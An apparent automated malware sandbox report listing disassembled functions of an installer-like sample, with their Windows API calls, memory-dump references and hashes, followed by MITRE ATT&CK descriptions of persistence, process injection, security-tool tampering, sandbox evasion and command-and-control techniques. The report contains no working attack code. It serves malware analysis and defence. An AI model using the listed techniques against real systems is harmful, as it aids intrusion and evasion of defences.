API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
String ID:
API String ID: 2987980305-0
Opcode ID: aa6b3be14d6657a1a1ac7f00cef48fe0d665c01fe79f9500f27f09d5bd23833b
Instruction ID: 3f2733cfc3de05a67066b1a81d0209d8d10e728cfd6e940428cc792ad37f86ee
Opcode Fuzzy Hash: aa6b3be14d6657a1a1ac7f00cef48fe0d665c01fe79f9500f27f09d5bd23833b
Instruction Fuzzy Hash: 9A21EB72904215BBCF10BFA4CE4DA6E79B0AB44358F60823BF601B62D1D7BD4D41EA5E

Function 0040231C Relevance: 6.1, APIs: 4, Instructions: 71registrystringCOMMON

Download Yara Rule

APIs

RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040235A
lstrlenA.KERNEL32(00409BC8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040237A
RegSetValueExA.ADVAPI32(?,?,?,?,00409BC8,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B3
RegCloseKey.ADVAPI32(?,?,?,00409BC8,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402490

Memory Dump Source

Source File: 00000015.00000002.5953312773.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.5953241468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953386017.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953458296.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953545481.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953545481.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_word.jbxd

Similarity

API ID: CloseCreateValuelstrlen
String ID:
API String ID: 1356686001-0
Opcode ID: 17483ab154d9487b715a571f948454f815bfe4516c15eb07c5d100d1d2da5f96
Instruction ID: 1cf33929fc1c1ea186c23a4fc9732b6d29fed694b94c5232bf99ec9a4aeb90bc
Opcode Fuzzy Hash: 17483ab154d9487b715a571f948454f815bfe4516c15eb07c5d100d1d2da5f96
Instruction Fuzzy Hash: 941172B1E00118BFEB10EFA4DE89EAF7678FB50358F10413AF905B61D1D7B85D41A668

Function 004015B3 Relevance: 6.1, APIs: 4, Instructions: 58COMMON

Download Yara Rule

APIs

Part of subcall function 0040581A: CharNextA.USER32(?,?,00421100,?,00405886,00421100,00421100,0042A400,?,77582EE0,004055D1,?,0042A400,77582EE0,00000000), ref: 00405828
Part of subcall function 0040581A: CharNextA.USER32(00000000), ref: 0040582D
Part of subcall function 0040581A: CharNextA.USER32(00000000), ref: 00405841

CreateDirectoryA.KERNEL32(00000000,?,00000000,?,00000000,?), ref: 004015DB
GetLastError.KERNEL32(?,00000000,?,00000000,?), ref: 004015E5
GetFileAttributesA.KERNEL32(00000000,?,00000000,?,00000000,?), ref: 004015F3
SetCurrentDirectoryA.KERNEL32(00000000,00429800,00000000,00000000,?), ref: 00401622

Memory Dump Source

Source File: 00000015.00000002.5953312773.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.5953241468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953386017.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953458296.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953545481.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953545481.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_word.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
String ID:
API String ID: 3751793516-0
Opcode ID: 337c7b3c4140c84b030b3cce5cd43aa59531b2b1dc8ea7579ad4e15f4152f9ed
Instruction ID: 1974da3e9f268a507fe0b48e67c441281edfefc09bb705423f1444e47e3c3739
Opcode Fuzzy Hash: 337c7b3c4140c84b030b3cce5cd43aa59531b2b1dc8ea7579ad4e15f4152f9ed
Instruction Fuzzy Hash: 4D112931908150ABDB113F755D4496F37B4EA62365728873FF891B22D1C23C4D42A62E

Function 00401EDC Relevance: 6.1, APIs: 4, Instructions: 54memoryCOMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeA.VERSION(00000000,?,000000EE), ref: 00401EEB
GlobalAlloc.KERNEL32(?,00000000,00000000,?,000000EE), ref: 00401F09
GetFileVersionInfoA.VERSION(?,?,?,00000000), ref: 00401F22
VerQueryValueA.VERSION(?,00409014,?,?,?,?,?,00000000), ref: 00401F3B

Part of subcall function 00405C4F: wsprintfA.USER32 ref: 00405C5C

Memory Dump Source

Source File: 00000015.00000002.5953312773.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.5953241468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953386017.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953458296.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953545481.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953545481.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_word.jbxd

Similarity

API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
String ID:
API String ID: 1404258612-0
Opcode ID: 88a471159faddf61ff8bf6f6ba4e081a66ca77f756c37004028b55345f5afde9
Instruction ID: daf777410944a799184fcc454f008e4928398c379a2567b3caca2a2cde185cee
Opcode Fuzzy Hash: 88a471159faddf61ff8bf6f6ba4e081a66ca77f756c37004028b55345f5afde9
Instruction Fuzzy Hash: 1B115EB1900208BEDB01EFA5D941DAEBBB9EF04344B20807AF505F61A1D7389E54EB28

Function 00404F50 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00404F7F
CallWindowProcA.USER32(?,?,?,?), ref: 00404FD0

Part of subcall function 00404038: SendMessageA.USER32(?,00000000,00000000,00000000), ref: 0040404A

Strings

, xrefs: 00404F60

Memory Dump Source

Source File: 00000015.00000002.5953312773.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.5953241468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953386017.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953458296.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953545481.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953545481.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_word.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: cc2ac9f72c883015c9b8c7a8e8247984937158d827f98eb0f0cc4c523cd7d41f
Instruction ID: e4ca6dfb8be9ac33f077af52de3e350fef620c5d1e65b576c63f1805fc4ef9c4
Opcode Fuzzy Hash: cc2ac9f72c883015c9b8c7a8e8247984937158d827f98eb0f0cc4c523cd7d41f
Instruction Fuzzy Hash: 1801D4B160420AAFDF209F50DD80A9B3B66FBC0315F144137FB00B52D1D7398C51A669

Function 004059B1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 004059C5
GetTempFileNameA.KERNEL32(?,?,00000000,?), ref: 004059DF

Strings

nsa, xrefs: 004059BC

Memory Dump Source

Source File: 00000015.00000002.5953312773.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.5953241468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953386017.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953458296.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953545481.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953545481.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_word.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: nsa
API String ID: 1716503409-2209301699
Opcode ID: 41eb4eacc2b5e04bba23a072be30983b5b4707d802c2e92527758f248babbe87
Instruction ID: 4ed204ab2def1aeaad47fe5e86fe5e9a332b18b7b34da24a025185dbc17c0528
Opcode Fuzzy Hash: 41eb4eacc2b5e04bba23a072be30983b5b4707d802c2e92527758f248babbe87
Instruction Fuzzy Hash: 60F02732308308BBEB008F16DC04B9B7B9CDF95720F00C03BF904EA281D2B0D8048B98

Function 004054A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00421500,Error launching installer), ref: 004054C9
CloseHandle.KERNEL32(?), ref: 004054D6

Strings

Error launching installer, xrefs: 004054B7

Memory Dump Source

Source File: 00000015.00000002.5953312773.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.5953241468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953386017.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953458296.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953545481.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953545481.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_word.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: 034994f398fec6ba88842b1298b049e6f5c009d7984ce4a05d2457150fb2f9bc
Instruction ID: 1668edf84edc795d90e5179e363d58f44986d7750dcb732495ea53e78f2e035e
Opcode Fuzzy Hash: 034994f398fec6ba88842b1298b049e6f5c009d7984ce4a05d2457150fb2f9bc
Instruction Fuzzy Hash: 8AE0E674A00209BBDB109FA4DD05A6B77BCEB14345B508561B911E2160E774D9548A79

Function 00406700 Relevance: 5.2, APIs: 4, Instructions: 236COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.5953312773.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.5953241468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953386017.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953458296.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953545481.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953545481.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_word.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02ed812fe0e611b0f2998a09c2da57c3139bdc2a01b144affc629b665b317990
Instruction ID: cc181508766c158152089796d80991778684c5c1c63ccc40f22f1fdcfebbd241
Opcode Fuzzy Hash: 02ed812fe0e611b0f2998a09c2da57c3139bdc2a01b144affc629b665b317990
Instruction Fuzzy Hash: C8A13371E00228CBDF28CFA8C8547ADBBB1FB44305F15816EE816BB281D7785A96DF44

Function 00406901 Relevance: 5.2, APIs: 4, Instructions: 208COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.5953312773.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.5953241468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953386017.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953458296.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953545481.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953545481.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_word.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 214f48695c7995470a7a0fcbeb3eca81d4e2424ba51fdacd53dd0d027dd6a452
Instruction ID: 3fc28d3a08aea7e3d86c5d24e10e7686d7df8f1296a80a0676572424d41607f7
Opcode Fuzzy Hash: 214f48695c7995470a7a0fcbeb3eca81d4e2424ba51fdacd53dd0d027dd6a452
Instruction Fuzzy Hash: FF912370E00228CBDF28CF98C8547ADBBB1FB45305F15816ED816BB291D7785A96DF44

Function 00406617 Relevance: 5.2, APIs: 4, Instructions: 205COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.5953312773.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.5953241468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953386017.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953458296.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953545481.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953545481.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_word.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aafcf2097c1515207922f326c8ed1c2e4537c5f7359ba1e2f684dafb2374b94b
Instruction ID: dd30d2edeb09ef8142f3126e4ca7f9bb6d977725bfad211a31da1ac854ab15b9
Opcode Fuzzy Hash: aafcf2097c1515207922f326c8ed1c2e4537c5f7359ba1e2f684dafb2374b94b
Instruction Fuzzy Hash: 29814771E00228CFDF24CFA8C8447ADBBB1FB44305F25816AD416BB281D7389A96DF05

Function 0040611C Relevance: 5.2, APIs: 4, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.5953312773.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.5953241468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953386017.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953458296.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953545481.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953545481.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_word.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 439609ef046878b9c851ba854847407a98b524300d750c8d5ff49980f3ce6887
Instruction ID: 9c7bf14ce72a16f54db54216be52a61449617ebae17e1f3f959b8044aea663dd
Opcode Fuzzy Hash: 439609ef046878b9c851ba854847407a98b524300d750c8d5ff49980f3ce6887
Instruction Fuzzy Hash: 42816771D00228CBDF24CFA8C8447ADBBB1FB44305F11816EE856BB281D7786A96DF45

Function 0040656A Relevance: 5.2, APIs: 4, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.5953312773.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.5953241468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953386017.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953458296.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953545481.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953545481.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_word.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ca8852c6a58b64f8378a0d1c7197c8df105657e20cc6a0d4183a5da649b504f
Instruction ID: 46e89f5986d2092b55afe70fa6685d9fa399791e8108fb818b391c00f2395523
Opcode Fuzzy Hash: 5ca8852c6a58b64f8378a0d1c7197c8df105657e20cc6a0d4183a5da649b504f
Instruction Fuzzy Hash: DB7134B1D00228CFDF24CFA8C9547ADBBB1FB48305F15816AE816BB281D7385A96DF45

Function 00406688 Relevance: 5.2, APIs: 4, Instructions: 170COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.5953312773.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.5953241468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953386017.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953458296.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953545481.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953545481.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_word.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b7285504dc25ebea62f348072f1f3953958a79e977259425cfc79aacb6983c9
Instruction ID: 5e67b4a66f05046138c2ae5a0676b57ce30197662a7df0c6b5261f8fe412ade3
Opcode Fuzzy Hash: 7b7285504dc25ebea62f348072f1f3953958a79e977259425cfc79aacb6983c9
Instruction Fuzzy Hash: 22713471E00228CBDF28CFA8C854BADBBB1FB44305F15816ED816BB291D7385A96DF45

Function 004065D4 Relevance: 5.2, APIs: 4, Instructions: 168COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.5953312773.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.5953241468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953386017.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953458296.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953545481.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953545481.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_word.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c3b74398c38f172e1519338bca71769cfe788df72e053bc328fcfef0089e390
Instruction ID: 362732d661397dfbd4d13a455e5b242d3c248a06ae4e9e58d05d54b49be68c20
Opcode Fuzzy Hash: 7c3b74398c38f172e1519338bca71769cfe788df72e053bc328fcfef0089e390
Instruction Fuzzy Hash: E7714671E00228CBDF28CF98C854BADBBB1FB44305F15816EE816BB291D7386A56DF45

Function 004058E7 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405B16,00000000,[Rename],00000000,00000000,00000000), ref: 004058F7
lstrcmpiA.KERNEL32(00405B16,00000000), ref: 0040590F
CharNextA.USER32(00405B16,?,00000000,00405B16,00000000,[Rename],00000000,00000000,00000000), ref: 00405920
lstrlenA.KERNEL32(00405B16,?,00000000,00405B16,00000000,[Rename],00000000,00000000,00000000), ref: 00405929

Memory Dump Source

Source File: 00000015.00000002.5953312773.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.5953241468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953386017.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953458296.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953545481.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953545481.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_word.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 0add82ed76356020c4ee8264c56a6ad6875436601f5ed096891bbb40787d2247
Instruction ID: 42f6177a7bbf9ad164fe3de6883cfd7493767cce72774148ee1a9d65a6b1b045
Opcode Fuzzy Hash: 0add82ed76356020c4ee8264c56a6ad6875436601f5ed096891bbb40787d2247
Instruction Fuzzy Hash: 87F06236604558FFC7129FA5DD4099EBBA8EF16360B2540A9E800F7260D674EE01ABA9

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
